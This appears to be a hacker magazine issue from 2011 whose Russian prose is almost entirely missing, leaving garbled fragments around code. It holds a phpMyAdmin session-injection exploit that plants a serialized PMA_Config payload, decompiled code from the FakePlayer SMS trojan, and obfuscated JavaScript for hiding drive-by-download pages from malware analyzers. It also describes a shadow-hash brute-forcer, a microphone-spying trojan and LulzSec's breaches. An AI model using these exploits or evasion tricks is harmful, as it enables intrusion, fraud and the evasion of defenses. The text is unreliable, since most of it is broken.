http://site.com/phpMyAdmin/scripts/setup.php?
action=lay_navigation&eoltype=unix&token=[]&
configuration=a:1:{i:0;O:10:"PMA_Config":1:
{s:6:"source";s:[_]:"[__FTP__]";}}

RFI-,

file_exists(), , , FTP-.
(
),
, rdot.org
FTP .
, unserialize()- phpMyAdmin < 3.
X 09/152/ 2011

, , ,
, phpMyAdmin :).
,
( ).
:
1. phpMyadmin;
2. HTML- , , :
preg_match(
'@name="token" value="([a-f0-9]{32})"@is',$page,$to);
$token = $to[1];

3.
:
preg_match(
'@phpMyAdmin=([a-z0-9]{32,40});?@is',$page,$se);
$session = $se[1];

4.
.
while :
$sess_path = array(
'/tmp/',
'/var/tmp/',
'/var/lib/php/',
'/var/lib/php4/',
'/var/lib/php5/',
'/var/lib/php/session/',
'/var/lib/php4/session/',
'/var/lib/php5/session/',
...


:
X 09/152/ 2011

$inj = $sess_path[$o].'sess_'.$session;
$query = $pma.'?session_to_unset=123&token='.
$token.'&_SESSION[!bla]='.urlencode(
'|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.
strlen($inj).':"'.$inj.'";}}');

: $sess_path[$o] $sess_path
, $session ,
$pma , $token .
$query : ,
. , ,
.
PMA_Config.

PHP-.
:
&_SESSION[payload]=<?php phpinfo(); ?>

payload ,
RFI.

. , ,
, Mango,
: magic_quotes_gpc = off PHP <= 5.2.13 & PHP <=
5.3.2.
.

, -

. ,
-
(
PoC ).
,
:). z

067


(icq 884888, snipper.ru)


blackhat

X-TOOLS
: Decodeby.US
deZender Public
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Ps2Gamer & Cyko

: -
: *nix/win
: & Slyer

PHP
-
Zend,
ionCube. , !
Decodeby.US deZender Public PHP-,

decodeby.us.
, :
1. .
2.
01_Decode.
3. Decode_ALL_Files.bat.
4.
02_Decoded ( Log_Decoded.txt
).

:
ionCube PHP Loader v3.1
NuSphere PhpExpress v3.0
Zend Optimizer v3.3

decodeby.us,
.

: MicSpy By SLESH 1.0b


: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: SLESH

MicSpy++ Nightmare.
, ,
,

068

.

.
,

MicSpy By SLESH, MicSpy++. ,
, (,
, / ).
:
1. mp3, 24
, 32 /, .
2. MPEG LAYER-3.
3. ___--.mp3.
4.
WEB-. c 4545
(http://127.0.0.1:4545).

:

;
/ ;

;
;
.

,
,
,
, :
1. MicSpy.dpr (
).
2. API.pas , .
3. MicRec.pas .

-


.
-,


, , .
-
:
1.
(
).
2.

(WYSIWYG-, CMS,
..).
3. .
4. , .
5.

(, ).
6. -
-.
7. (
).

:
-;
;
X 09 /152/ 2011

;
;
.
, ./
run .
,
.
,
,
, .
.

,

.


, ,
,
.
.
./results, ./bases,
./data .
config.ini db. ,
, .
. -
.
,


hack4sec, hack4sec.
blogspot.com.

: Bash-Brutoforcer
:*nix
: Cyber-punk and Simo2553

md5
:

md5- /
etc/shadow.
-
X 09 /152/ 2011

.
!
bash- BashBrutoforcer,
.
, :
1. shadow-;
2. ;
3. .

,
Linux.
:
./md5brute.sh -w(ordlist)|-n(umbers)|
-i(nformation)|-b(ruteshadow)
hash|shadow
-w (X="/usr/share/dict/
words" )
-n
-b shadow


,
.

(bit.ly/qaNAkq).

.;
;
- ;
.
:
.
, (
).
, .
html .
, .


, - .

. ,
bit.ly/ncfPFh,
,
.

: IR-ID MAKER
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: ParsProg Software

:
Mail.ru
: *nix/win
: Fepsis

Yahoo
Yahoo.
:

Mail.ru
Mail.Ru,
.
, (
:)
? ,

?


Mail.ru
Fepsis.
:
:
login@mail.ru:pass
login@list.ru:pass
login@bk.ru:pass
login@inbox.ru:pass


( );

;
;
;
Yahoo.

:
1. Yahoo ID
( ).
2. Password .
3. First name Last name
,
.
4. START,
CREATE.
5. . z

069

MALWARE

ANDROID-


(Trojan-SMS.AndroidOS.FakePlayer)
Android. apk-
.
Android
apk
(Android PacKage).
ZIP- . , ,
7-Zip` Player.apk (. 1).
, apk-
. META-INF res,
AndroidManifest.xml, classes.dex resources.arsc.
apk-.
.

070

Classes.dex

classes.dex apk-,
Dalvik Virtual Machine. , , Android
Java, .class,
dx,
.dex,
.
, ,
. classes.dex ,
.
X 09 /152/ 2011

, TrojanSMS.AndroidOS.
FakePlayer

Player.apk

Resources.arsc


xml-, . Hiew, (
:)) . APKTool (code.google.
com/p/android-apktool).
xml`
.
: public.xml strings.xml.
:
<?xml version="1.0" encoding="utf-8"?>
<resources>
<public type="drawable" name="icon"
id="0x7f020000" />
<public type="layout" name="main"
id="0x7f030000" />
<public type="string" name="app_name"
id="0x7f040000" />
</resources>

Public.xml ,
,
.
: Animation, Color State List, Drawable, Layout,
Menu, String, Style . drawable, layout
string. ,
,
,
. strings.xml
:
<?xml version="1.0" encoding="utf-8"?>
<resources>
<string name="app_name">AndroidApplication1
</string>
</resources>

public.xml app_
name string, strings.xml
AndroidApplication1.
app_name
,
. res, .
X 09 /152/ 2011

Manifest.xml


APKTool.
,
: (package), , (android:label),
,
(android:name), (android:icon)
.. :
<?xml version="1.0" encoding="utf-8"?>
<manifest package="org.me.androidapplication1"
xmlns:android="http://schemas.android.com/
apk/res/android">
<application android:icon="@drawable/icon">
<activity android:label="PornoPlayer"
android:name=".MoviePlayer">
<intent-fi lter>
<action android:name="android.
intent.action.MAIN" />
<category android:name="android.
intent.category.LAUNCHER" />
</intent-filter>
</activity>
</application>
<uses-permission android:name="android.
permission.SEND_SMS" />
</manifest>

, , , . usespermission. ,
, SMS (android.
permission.SEND_SMS).

RES

res . : drawable
layout. ,
. ,
icon.png.
icon public.xml.

main.xml, :
<?xml version="1.0" encoding="utf-8"?>
<LinearLayout android:orientation="vertical"
android:layout_width="fill_parent"

INFO

info
Android
SDK
: developer.
android.com/index.
html.

071

MALWARE

, jar-
{
super.onCreate(bundle);
DataHelper datahelper = new DataHelper(this);
if(datahelper.canwe())
{
TextView textview = new TextView(this);
Random random = new Random();
textview.setText(
"\u041F\u043E\u0434\u043E\u0436"
"\u0434\u0438\u0442\u0435...");
setContentView(textview);
SmsManager smsmanager = SmsManager.getDefault();
StringBuilder stringbuilder = (new StringBuilder(
)).append("************");
int i = random.nextInt(0xf4240) + 0x186a0;
String s = stringbuilder.append(i).toString();
android.app.PendingIntent pendingintent = null;
android.app.PendingIntent pendingintent1 = null;
smsmanager.sendTextMessage("***", null, s,
pendingintent, pendingintent1);

manifest.mf,
META-INF
android:layout_height="fi ll_parent"
xmlns:android="http://schemas.android.com/apk/res/
android">" <TextView android:layout_width="fill_parent"
android:layout_height="wrap_content" android:t
ext="Hello Android from NetBeans" />
</LinearLayout>

,
(android:orientation
LinearLayout), TextView (Hello Android from
NetBeans) (android:layout_width android:layout_
height).

META-Inf

META-INF : , , dex- ..

classes.dex.
, .
dex2jar (code.google.
com/p/dex2jar). jar-,
. , dex2jar , , dedexer. ,
P- Dalvik.
dex2jar
jar-, . , (. 4).
class-
Java. Jad, .
Java, .
.
: R.jad, R$attr.jad, R$drawable.jad, R$layout.jad
R$string.jad. . ,
,
MoviePlayer. ,
( ):
public class MoviePlayer extends Activity
{
public MoviePlayer()
{
}
public void onCreate(Bundle bundle)

072

...
}
finish();
}
}

DataHelper DataHelper.jad DataHelper$OpenHelper.jad.


,
(if datahelper.canwe()). .
, , SQLite- dwap.db.
table1
was, . .

textview.setText. -, -
.
(random.nextInt) (smsmanager.
sendTextMessage). .
,
.

,
-.
-,
:), ,
, ,
. -, . z
X 09 /152/ 2011

MALWARE
Korse
(andrepetukhov.wordpress.com)

DRIVE-BYDOWNLOAD
-

wepawet

Drive-by-Download.
,
,

(, flashplayer, pdfviewer, ActiveX ..).

. ,
- ,
. . ,
: ,
, . - . , ,
- HTML+JS+CSS,
:
, ,
.

wepawet (wepawet.cs.ucsb.edu/),
X 09 /152/ 2011

100%.

,
IP-. , ,
. , IP- ,
.
,
- .
IP-
(https://check.torproject.org/cgi-bin/TorBulkExitList.
py) . IP- ,
,
(

073

MALWARE

AJAX- onscroll

Firefox 4.0

alert(1)
LastModified-
, , ,
).

referrer. ,
, referrer
facebook.

Fingerprinting

, IP- . .
-, security- , IP- , . -, OpenVPN, -,
,
,
(, ). ,
(. HtmlUnit), ,
.

.
.
CAPTCH
, ( onmousemove ,
). ,
.
web
.
: HTML5, JavaScript, CSS .. , :
1. User-agent
JavaScript.
2. HTML5.
3. HTML + events.
4. .
.
1. User-agent JavaScript
user-agent,
,

074

. ,
. .

JS.
2. HTML5
: HTML5.
(, caniuse.com, browserscope.org).
.
, ,
:
Firefox 4.0
<svg xmlns:svg="http://www.w3.org/2000/svg"
xmlns="http://www.w3.org/2000/svg" viewBox="0 0 200 100"
width="0px" height="0px" id="inlineSVG">
</svg>
<script type="text/javascript">
var isFF = !!(1*({toString:0,valueOf:function(x){
return !!x;}}));
var inlineSVG = document.getElementById("inlineSVG");
var isFF4 = isFF && (inlineSVG != null);
</script>

3. HTML +
JS HTML5
JS. , , XSS. XSS
( html5sec.org),
JS, onfocus, onblur, onscroll. , XSS,
? : !
, , ( , , HTMLUnit,
),
. onscroll
html5sec. AJAX-
.
<body onscroll=makeAJAXrequest(1,eval)>
<br><br><br><br><br>
<br><br><br><br><br>
<br><br><br><br><br>
X 09 /152/ 2011

<p>- Xpath

Wepawet
<input autofocus />
</body>
/* makeAJAXrequest(param, callback)
*/

4.

, , : flash, pdf,
java, ActiveX, etc. ,
. , ,
: panopticlick.eff.org.

.
,

, .

, . JavaScript ,
jjencode (utf-8.jp/public/jjencode.html).
,
, .
, .
, , ,
. ,
HTTP, , . :
LastModified-
<script type="text/javascript">
var dt = new Date(document.lastModified);
var str = "di`wq-4,>"; //XORed "alert(1);" with key 5;
var key = dt.getHours() % 8;
var result ="";
for(i=0;i<str.length;++i)
{
result +=String.fromCharCode(key^str.charCodeAt(i));
}
eval(result);
</script>

, ,

.
:
1. .
X 09 /152/ 2011

JavaScript jjencode
:
var func = eval;
func("alert(1)");

2. Xpath JavaScript.
:
<p>- Xpath
<script type="text/javascript">
var paragraphs = document.evaluate("//p",
document, null,
XPathResult.ANY_TYPE, null
);
</script>

3. HTML5 , .
, , SELECT, , eval.
, , ,
SQL. , Ecmascript for XML, XML:
alert(1)
<script type="text/javascript">
openDatabase('',1,1,0).transaction(function($){
$.executeSql('SELECT "al" || "er" || "t(1)"', [],
function($,results){
for(i in results.rows.item(0))
eval(results.rows.item(0)[i])
})
})
</script>


. -
. , , ,
wepawet ,
. z

075


I ncognitus (mifrill@real.xakep.ru)

Crutop, RX-Promotion, Fethard Chronopay

076

X 09 /152/ 2011

HTTP://WWW
links
http://bit.ly/iXANMF

.
http://bit.ly/e1x29l
Chronopay

.
http://bit.ly/n9MfMy


RedEye.
http://wapo.st/2oV3Ye
Washington
Post.
http://sporaw.
livejournal.com/89032.
html .

RedEye - ,
. -, , Fethard, 19 . ,
!

RedEye 1999 .
,
( )
.
Pornocruto.nu.
,
: rape zoo.
. ( Ibill.com). .
X 09 /152/ 2011


news-.

,
.

,
, , . RedEye
,
- ,

. ,
.

.
- Crutop.nu.

, , .
2005
.

Master-x.com .

(
).

077


:
, ,

.
:
,
Pornocruto.nu,
50%- .
2000
.
:
- , , 95% .
, ,

- . RedEye
Rape.
cash.pornocruto.

nu .

Pornocruto Cash

2000 2002 Pornocruto Cash (PC).


9 ,
. ,
80/20: 80% 20% .
Scream and Cream (www.
screamandcream.com).
2000 ,
RedEye , :

.
www.badtales.com www.violentcomix.

com
,
BDSM-
Gary Roberts.
bit.ly/pZLnJS.

, .
, ,
. ,
,


? , !


Ibill.com. 35-40
.
2001-2002
( 200
).
,
,
, Crutop, RedEye
,
Pornocruto Cash .
Pornocruto Cash
170 200 .
( 2001-2002 !). ,

, .

Pornocruto Cash

Pornocruto Cash
2002 , Ibill .
, Pornocruto Cash.
-
, .

:
1999

2000

pornocruto.nu : zoo- rape-.



,
: Forbes
,
. Ibill.com.


, .
RedEye
,


.
-. 2005 -.

Pornocruto.nu

078

Crutop.nu

X 09 /152/ 2011

RedEye RedEye,
.
:
, !

2002 c Desp (
),

, .

CHRONOPAY B.V., .
?
. ,
(Ronnie Beernaert),
Pornocruto Cash, RedEye
CHRONOPAY B.V.
,
: ,

.
, rape

fantasy domination BDSM. Pornocruto Cash
2009 .

,
, .
, , Fethard
RedEye, , ,
, ,
RedEye ,

-.
2003 RedEye
Fethard.biz. , Crutop.nu, ,
Fethard , , .
, 2007
RedEye adult ,

.
Fethard.biz
.
,
, Fethard , .
Fethard
: Yambo ( Y
, ),
CapitalCollect, Ecuator.biz,
.
, ,
2003-2007
Fethard.biz.
2007 Fethard.biz .

Fethard 2008

Fethard .
RedEye.
.
,
100%- -

. Fethard.biz :
1.
;
2.
.
, 12 2007
Fethard.biz Crutop.nu
.
3295 440 000
:
Crutop.nu. , 12 2007
Fethard.
biz.
. ,
. RedEye - .
,
- .
Fethard?

: ,
Fethard,

( -

2001

2002

2003

Cash.Pornocruto.nu
.
9 -,
,
.
Scream and Cream (www.
screamandcream.com).
Pornocruto Cash $170200k ,
Ibill.com.

2002 Ibill
, , :
rape- .
CHRONOPAY
B.V.,
(Ronnie Beernaert),
Pornocruto Cash. 9

Chronopay.

Fethard -,

.
cash out-:



.
Crutop.nu,
.

Fethard

Fethard -,

.
Fethard Finance ,
-
.
Fethard.biz 2002 RedEye
Crutop.nu.

Crutop.nu
Fethard , ,

Pornocruto Cash

X 09 /152/ 2011

Fethard

CHRONOPAY B.V.

Fethard

079

Chronopay
), ,
,

-,

, PIN- () .
,
,
Fethard .

-, ,
.

. RedEye $6 000 000.
(
2007 ), -

,

.
RedEyea, , ,
.

.
, 12 2008
.
,
.
:).

, .

,
30 www.redeyeblog.com, ,
, RedEye,
.

, , 76
bit.ly/eu0OHE.
.
chronopay.com
Google Analytics.
, ,
ID , RedEye: cash.
pornocruto.es etu-cash.com.

2004-2006

2007

2008


. Fethard 200% ,
Chronopay
high risk- , spyware,
. 2006
Fethard.biz
.

12 2007 Fethard.
biz,
. 1-2 1-2
4 .
RedEye,
PIN
. ,
6 .

RedEye : , 12 2008 ,
.
,
.
Fethard 19 .

080

=
RedEye?

Fethard

X 09 /152/ 2011



crutop.nu
Pornocruto Cash
Chronopay
Fethard
- Rx-Promotion

,
.
DDoS-

( Chronopay)
Engel,
.
,
, , . RedEye
, . (
-
), .
.
, .
:
,
.

(!) , , ,
.

, ,
Mac- Mac Defender, DDoS-
,

RX-Promotion . , DDoS ! z

2009

2010

2011


(,
..)
.
: , , .
:

Harley Davidson.

: , 25-26
2010
,
2009-2010 ,
cvv-.
, - NS- .


, (!)
.
DDoS- (
Chronopay)
. 25 RedEye

, .

Welcome to Russia!
-
( )
.

Chronopay


(www.chronopay.ru),
CHRONOPAY B.V. .
:

,

, .
,

,

Rx-Promotion

X 09 /152/ 2011

high risk-
:
, spyware, , ..
www.redeye-blog.com:
,
. , ,
, ,
.

chronopay.com

081

Mifrill , (mifrill@real.xakep.ru)

LulzSec


. Lulz Security : , ,
IT-. ,
, for lulz, . .

2011

,
, ,
+ .
,
,
.
,
, , , ,
, , .
, ,

082

. , ...
- Lulz Security,
,
. , , , .
Lulz Security
( LulzSec Lulz Boat )
. ,
, .
X-Factor ,
, American Idol Britains Got Talent.

X 09 /152/ 2011

250 ,
12 . , , , email .
LulzSec (lulzsecurity.com)
Releases, ,
.
SQL, txt, .
, ,
, .
:
LulzSec, , ,
: .
, , ,

, .

: twitter.com/LulzSec.

, ,
.
LulzSec ,
Fox.
Fox Broadcasting. ,
, -

!
.
,

LulzSec. Fox,
(, , Firefly?)
Fox .

AntiSec, LulzSec

X 09 /152/ 2011

083

. PBS
,
Lulz Boat ,
. .
Sony ,
, . LulzSec
. SonyMisic.
co.jp SQL, ,
, ,
. LulzSec : 1337 h4x0r,
- Sony.
8? 7 ?!.
, , (
Sony, ).
, Lulz Security WikiLeaks
-
, , .
-
gray hat (
) , . , LulzSec,
.
- .

Lulz Boat

. 0day- MoveableType,

084

Havij 1.14 Pro ( SQL-), (PBS).


. PBS NewsHour
, 15

. PBS
Twitter
, .
, ,
0day-, , LulzSec php ftp, ,
27 2.4.21-37.ELsmp 2005 i686.
, , .
All your base are
belong to LulzSec ( LulzSec), , , SQL .
, PBS.
, ,
- , MySQL- .
, , ,
. LulzSec :
PBS Wikileaks,
. Frontline:
Wikisecrets PBS . ,
,
. , , .
X 09 /152/ 2011


:
. WikiSecrets,
- .
PBS, ... .
,
( !)
. , , :
!
, ,
PBS. PBS ,
.

LulzSec , LulzSec .
: .
, ,
. , ,
.
, , .
, Sony ,
LulzSec , .
, , Sony
Playstation Network.
,
?,
. ,
, .
. LulzSec:
SonyPictures.com SQL, , .

!.. .
, , email-, ,
, , . , Sony Pictures ( ),
75 000 3,5 .
, LulzSec
.
- , , ,
.
Sony
IT , LulzSec
.
,
. LulzSec , ,
( ), ,
.
InfraGard.
, ,
, .
, .
infragardatlanta.org LulzSec 180 ,
X 09 /152/ 2011

LulzSec
(,
:)

085

? Lulz
Security.
Fuck FBI Friday.
, ,
, LulzSec Nintendo.
(
).
, LulzSec
,
lulzsecurity.com nintendo.com.

Sony, Sony Computer Entertainment
Developer Network.
, ,
.

. AntiSec

, ASCII

Chinga la migra
. , ,
( Unveillance,
)
Infragard .
LulzSec ,
, Unveillance .
, , .
,
LulzSec
Unveillance . .
, LulzSec ,
, -

086


, 13-
.
:
, . .
, ,
.
,
.
Senate.gov. ,
? - ?.
Reuters, ,

,
.

.
Lulz Boat Pron.com, 26 000 ,
. Facebook
.
, ,
, email-
, . ,
, 26 ,
.
LulzSec 55 .

Bethesda Softworks
ZeniMax Media .
,
, ,
: . , : LulzSec email-,
, BRINK,
. ,
,
200 000 BRINK Quake 4.
LulzSec , ,
Bethesda. - , .
, -
, , .
X 09 /152/ 2011

LulzSec,
... , , EVE Online, Escapist
Magazine, Minecraft League of Legends. LulzSec
, :
, .
, , , .

, .

. 4chan /b/
, LulzSec,
, , , . ,
. - ,
, ! .
, LulzSec, ,
. , , ,
LulzSec , AntiSec.
AntiSec, , .
LulzSec
. cia.gov ,
. LulzSec : cia.gov .
AntiSec. , 90- .
,
. AntiSec,
, , ,
,
.
LulzSec
. ,
DDoS, - .
Lulz Security :
t.co/JhcjgO9 #AntiSec,
.
,
presidencia.gov.br, brasil.
gov.br .
Twitter, , , , ,
.
, DDoS.

.
SB1070, ,
LulzSec ,
.
Chinga la migra,
. LulzSec email-, . , .

, LulzSec ,
,
.
20- , ,
X 09 /152/ 2011

( )
LulzSec. , 19 . , LulzSec :
, LulzSec , ... ... , , !
?.
, 26- , -
.
50- , : !.
, , , , , , ,
, , . ,
, - - , , .
LulzSec ,
, . , ,
LulzSec AntiSec,
, , ,
.
LulzSec . :
AOLinternal data.txt
AT&T internal data.rar
Battlefield Heroes Beta (550k users).csv
FBI being silly.txt
Hackforums.net (200k users).sql
Nato-bookshop.org (12k users).csv
Office networks of corporations.txt
Private Investigator Emails.txt
Random gaming forums (50k users).txt
Silly routers.txt
navy.mil owned.png

LulzSec (@
AnonymousIRC) : @LulzSec
. ? .
, , ?
, ,
,
.
. The Guardian IRC- #pure-elite,
. Lulz
Security , ,
, LulzSec,
. , joepie91, Neuron, Storm, trollpoll voodoo
Lulz Boat, ,
, .

? . ,

The Sun. News
Corporation. , News Corporation News International
The Times. , LulzSec
.
,
. z

087

PWNIE
AWARDS
2011

:
?



The Pwnie Awards.

, .
. .
. ?
, pwn\own
(, , ) pony (,
, ). The Tony Awards
, , , . , , . ,
.
.
Black Hat, .

088

01


.
,
.

Padding Oracle
ASP.NET (CVE-2010-3332)
(Juliano Rizzo), (Thai Duong)
, ASP.NET
Padding Oracle,
ASP.NET
web-,
.


Microsoft FTP (CVE-2010-3972)
(Matt Bergin)
, ftp- Microsoft.
- Telnet IAC ( , 0xFF).
:
, FTP-
.
(Chris Valasek) (Ryan
Smith), EIP
, ftp-.


ISC dhclient (CVE-2011-0997)
(Sebastian Krahmer)
(Marius Tomaschewski)
ISC dhclient DHCP-.
,
. ,
DHCP-
.

IPComp
BSD- (CVE-2011-1547)
(Tavis Ormandy)
BSD-
IPComp,
IPSec. IPComp , ( ). ,
.


Exim (CVE-2010-4344)

Exim
, .
. , EIP, shell-,
.
X 09 /152/ 2011

02 03

,
. ,
.

FreeType iOS (CVE-2011-0226)|


Comex|
Comex Type
1 FreeType,
Safari. ROP-, Comex ASLR iOS
. Comex
jailbreakme.com iOS .

Google Chrome
VUPEN
security- VUPEN
Google Chrome, Google

. , security-
Google , VUPEN -
Flash. , Flash ( Chrome )
, HTML. VUPEN , , ,
.


Java (CVE-2010-4452)
(Frederic Hoguin)
, Java .
- .
JRE 100% .

Blackberry Pwn2Own
(Vincenzo Iozzo), (Willem
Pinckaers), - (Ralf-Phillipp Weinmann)
WebKit ,
BlackBerry.
, , , -
RIM.

, .
,
.
, .

CSRSS (CVE-2011-1281)
j00ru (Matthew j00ru Jurczyk)
Windows CSRSS,
:

, ,
SYSTEM (utilman.exe) .


set_fs (CVE-2010-4258)
(Nelson Elhage)
Linux,
CLONE_CHILD_CLEARTID
set_fs function ,
,
DoS. PoC
.


Linux $ORIGIN (CVE-2010-3847)
(Tavis Ormandy)
, glibc $ORIGIN
LD_AUDIT,
setuid
. root.

win32k user-mode
callback Windows (MS11-034)
(Tarjei Mandt)
, 40
Windows. Infiltrate 2011, .

XSS Android
(Jon Oberheide)
XSS- Android, ,
.

X 09 /152/ 2011

089

04 05

, ,
,
email-.

Stackjacking
(Jon Oberheide),
(Dan Rosenberg)

Linux Grsec-
spender
PaX Team. ,
,
.


Flash ActionScript
(Haifei Li)
JIT Flash ActionScript
, Windows 7, ASLR DEP.

Adobe Shockwave
(Aaron Portnoy), (Logan Brown)

SmartHeap Adobe Shockwave.

.

|
Static Binary Rewriting|

, .


OpenSSH Novell NetWare
: Novell
ZDI advisory , , Novell , DoS
, ZDI
. 0x41414141 .

Magix Music Maker 16



: Magix
CORELAN Music Maker 16,
, PoC-.
, .

RSA SecurID
: RSA
, SecurID .
RSA?
, . ,
. ,
RSA Lockheed-Martin.

(Piotr Bania)|
- pax-future.txt,

Windows, [ !]
,
Windows.

LFH-
(Chris Valasek)

Low Fragmentation Heap Windows 7 Vista. !

090

X 09 /152/ 2011

06 07

Epic 0wnage

110%,
.
, ?
, (-) epic fail.

Sony
:

Epic 0wnage ,
,
. , ,
oww ( 0wnage) .

Sony|

CMS,

Google Apps, , , . .
, HBGary Federal , 1,21 -oww.

Fail0verflow GeoHot ,
PS3, Sony .
, , ,
, .
Sony GeoHot , .
, ,
MiniDisc.

Sony|
, . ,
Sony Sony Online
Entertainment (SOE). 25
SOE ( 77 )
.
, : FAIL.

Sony|
- Sony
. , , Sony?
LulzSec, , , Sony
FAIL.

Sony|
Sony , PlayStation
Network , .
PSN , .
, ,
8- ,
. , Sony.

Sony|
?
, ! , Sony
,
. , .

X 09 /152/ 2011

HBGarry Federal

LulzSec ,
LulzSec . Fox
News, PBS, Nintendo, pron.com, NHS, Infraguard, ,
Bethesda, Minecraft, League of Legends, The Escapist, EVE
online, , The Times The Sun.

.

(Bradley Manning) Wikileaks


Wikileaks ,
.
CD .

Stuxnet
? ?
0day- , , ?
.

08

? ,
( ),
.
Pwnie HD Halvar
. , , .

. Geohot
Sony . ,
, . z

091

UNIXOID
(execbit.ru)

Android-

Linux,
, Android
. , ,
,
, ,
, .


, , Android
,
.

,

. , Android : ,
SD- ( -

092

-) .
, .
, , .
- ,
, , ,
micro-USB-.
Wi-Fi
3G-, Android ( $100 ).
Android ,
.
X 09 /152/ 2011

FTPServer

INFO
ADB

WebSharing

, FTPServer.
FTPServer FTP- ,
SD-. : , ,
User (FTP-), Pass (
), Port ( 1024, , 1234), Default dir
( , /sdcard /mnt/
sdcard), Any Network
Save and Restart Service.
, IP- FTP-.
FTP-, , /
usr/bin/ftp mc. ,
,
.
FTP-, ,
.
SFTP, SSH- Android
( , ),
- WebSharing.
WebSharingLite
HTTP-, NextApp.

,
, (
Wi-Fi,

).
,
, ,
(, ,
).
. Start . IP- ,
,
. WebSharing
Wi-Fi,
(Menu Settings Network Settings Cellular
access).
.

X 09 /152/ 2011

Android
ADB (Android Debug Bridge).

,
Android SDK (
xda-developers.com).
ADB ,
,
, shell-,
, ,
.

info
Android

Dropbox-,


.

ADB
,



Android.
ADB

,
.

,

QR-
Barcode Scanner.

093

UNIXOID

ADB ,
(
USB).
micro-USB- ADB :
$ ./adb devices
016804110602C024

SSH-

device

, , , ,
.
adb shell, shell-
, ( ) Linux.
POSIX- id, ls, ps ..
, , , , /bin/
su, root ( , /
SD-).
root-,
busybox, ,
. ,
SuperOneClick (shortfuse.org,
Linux mono SuperOneClick.exe).
ADB, .
,
. :
$ for apk in *.apk; do ./adb install $apk; done

ADB :
$ ./adb push __ ///

:
$ ./adb pull /////

,
,
.
adb sync,
:
$ ./adb sync ///////
/

, / ( ).
ADB
( ):
$ ./adb reboot-bootloader

FTP Server

094

ADB ,
,
,
. , Android
ADB .
, Wi-Fi-, , Debug
over USB only ( Debug over
X 09 /152/ 2011

Open Source), ,
,
SSH- Android,
. :
1. , xda-developers.com,
SuperOneClick z4root (goo.gl/Bv7tx,
Android).
2. BusyBox (,
BusyBox Installer). , root
SuperOneClick.
3. Dropbear:
$ wget http://jhulst.com/dropbear.tar.gz
$ tar -xzf dropbear.tar.gz
$ ./adb push ~/dropbear /sdcard
$ ./adb shell
> su
> mount -o remount,rw /system
> cp /sdcard/dropbear/* /system/xbin
> chmod +x /system/xbin/dropbear /system/xbin/
dropbearkey
> mkdir /data/dropbear
> dropbearkey -t rsa -f /data/dropbear/dropbear_
rsa_host_key
> dropbearkey -t dss -f /data/dropbear/dropbear_
dss_host_key

DroidSSHd

ConnectBot

Lazier Geek

ConnectBot
USB only). ADB 5555 ( IP- : Wi-Fi
IP-).
ADB :
$ ./adb connect IP-

:
$ ./adb devices
192.168.0.100:5555

device

,
, shell.
SSH-.

SSH

, Java-
, Android
Linux-,
,
POSIX. ,
Linux-, SSH-,
Dropbear.

SSH-, SD-
SFTP,
Linux.
Dropbear
Android, SSHDroid Android Market .
(Dropbear -
X 09 /152/ 2011

, Dropbear ,
SSHDroid.
DroidSSHd (code.google.com/p/droidsshd/)
Dropbear , CyanogenMod 7.1. DroidSSHd
SSH- ,
, ,
( , )
.

,
, Service and Authentification.
(
password), ( SD), (TCP port to
listen, 2222)
(Start on boot).
,
( ),

System settings Run daemon as root.
,
Start. IP-, .
SSH-,
, ssh:
$ ssh android@192.168.0.100:2222

( )
Android .

095

UNIXOID

SSHmote

Transdroid

VLC Remote

Android VNC
Viewer

droid VNC Server

WebSharing

096

SSH-, ( ) ConnectBot. SSH-


, SSH .
,
, (Apache
License 2.0, ),
( )
SSH.
,
, . ConnectBot
, ,
.
. -,
/
(, px
ping xakep.ru), -
Android Lazier Geek. Lazier Geek

.
, ,
,
.
, Lazier Geek,
: Name
, Host
IP, User Pass.
, ,
. Save
,
. .


. ,
,
.
Windows, ,
Linux, Java, . ,
- .
, ,
SSHmote. mplayer, VLC, Amarok,
Kaffein ,
SSH, ,
, ,
SSH-.
SSHmote . SSH-,
(
)
(, Home mplayer).
,
,
. ,
,
/, , ..
SSHmote
, : SSH- ,

,
screen , ,
. , VLC,
VLC- VLC-Remote (
,
,
Peter Baldwin).
VLC Remote ,
, , VLC HTTP-.
:
$ vlc --extraintf=luahttp --fullscreen \
--http-album-art --qt-start-minimized

, VLC , IP
:
$ su -s
# echo 123.456.789.012 >> /usr/share/vlc/lua/
http/.hosts

0.0.0.0/0
IP-,
.
, (, ),
Add VLC server IP- . (
), .. , , Amarok2 Remote, Banshee Remote
mythdroid MythTV. .
Torrent- Transdroid.
,
, (QR- ). Transdroid Torrent-
Linux, .
,
Transmission.
Transmission .

Web.
web-.
, .
Transdroid, ,
,
, (Transmission), IP, 9091, , , ,
.

,
. ,
- , VNC ( ). VNC-
, ,
Android Linux. Android, Android VNC Viewer,
X 09 /152/ 2011

000000

SSHmote ,

VLC Remote

.
, :
1. VNC-:
$ sudo apt-get install tightvnc

2. ~/.vnc/xstartup
, :
$ vi ~/.vnc/xstartup
xrdb $HOME/.Xresources
startfluxbox &

(, startkde).
3. vncserver,
n
.
4. Android VNC Viewer, Password
( ), Address (IP- ), Port (
5901 5900) 24-bit
color Color Format, . Connect

.
,
.
VNC- droid
VNC server, Start
Server. vncviewer:

VNC-? !

,

Android. , .
: Wifi keyboard, ;
Chrome to Phone Google
Chrome ; IP
Webcam, web-; Remote
Web Desktop, ; NagMonDroid, Nagios; Zabbix
on the go Zabbix-. z

$ vncviewer IP-:5901

,
5801.
X 09 /152/ 2011

097

UNIXOID
Adept (adeptg@gmail.com)

38

,
: SiSoft Sandra,
3DMark, PCMark . nix ,
, .

CPU

, CPU.
.
Super Pi. Linux,
( 64- ).
Linux Pi. :
# apt-get install pi

, Pi
.
:
$ time pi 1048576 >/dev/null | grep real

, Pi 1048576 . Intel Core i5-2410M


0m1.675s, Intel Core i5-2300 0m0.137s.
, ,
, . ,
Pi ( Super Pi) .
. 7-zip
CPU ( / ,
, ). :
$ 7z b

, . ,
: / KB/s,
( )
MIPS ( ).

098

MIPS ( Linux
Tot).
Intel Core i5-2410M : 344, 2065, 7064. c ( ),
, MIPS, ,
(
).
Intel Core i5-2300 (): 357, 3049,
10771.

sysbench CPU. .
$ sysbench --test=cpu --cpu-max-prime=20000 run

, :
. Core i5-2410M
30,9614, Core i5-2300 27,8938.
GUI , hardinfo.
.
CPU . .
, .

, , ,
. , Linux mbw (Memory
BandWidth).
. :
,
. ( 10),
X 09 /152/ 2011

, benchmark GUI


